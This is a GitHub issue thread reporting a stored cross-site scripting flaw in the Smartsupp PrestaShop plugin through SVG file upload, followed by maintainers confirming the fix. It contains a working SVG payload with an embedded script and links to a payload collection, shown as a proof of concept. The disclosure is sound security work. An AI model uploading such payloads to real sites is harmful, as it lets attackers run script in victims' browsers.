### ISSUE TITLE
Security Risk: Stored Cross Site Scripting (XSS) via Arbitrary File Uploading

### ISSUE THREAD

**Issue by kleiton0x00** [smartsupp/plugin-prestashop#4]
## Environment
- Tested on the latest version of Smartsupp
- Prestashop version > 1.7

## Steps to reproduce

1. Upload a **.svg** file which has the following code (or you can download the file directly from [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg)):
```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
```

2. Navigate to https://files.smartsuppcdn.com/files/accounts/365068/uploads/sicF3GDAK.svg?name=SVG_XSS.svg (which is the attached file by user) and the XSS will be triggered.
![Screenshot from 2020-12-30 13-22-04](https://user-images.githubusercontent.com/37262788/103351015-1d337100-4aa2-11eb-915a-1bb219080f54.png)

## Impact 
An attacker can run any arbitrary Javascript code when the user/administrator views the attached image.

## Mitigation
Users should not be able to upload **.svg** files.

**Comment by petras-m** [comment]
This issue should be fixed now. @dkMorlok close it here, once it is released.

**Comment by kleiton0x00** [comment]
Please let me know what version will fix this vulnerability and if there will be any [CVE](https://cve.mitre.org/) related to the issue (would be very helpful to me about vulnerability reporting).

**Comment by dkMorlok** [comment]
Upload SVG is blocked. There is no need to update clients. When you try upload SVG you will see it's not allowed anymore.

**Comment by petras-m** [comment]
@kleiton0x00 it was configuration of the system which has changed. So far, we do not have set processes to write an associated CVE. Sorry for that.

**Comment by kleiton0x00** [comment]
Thanks for thefast response, feel free to close the issue.
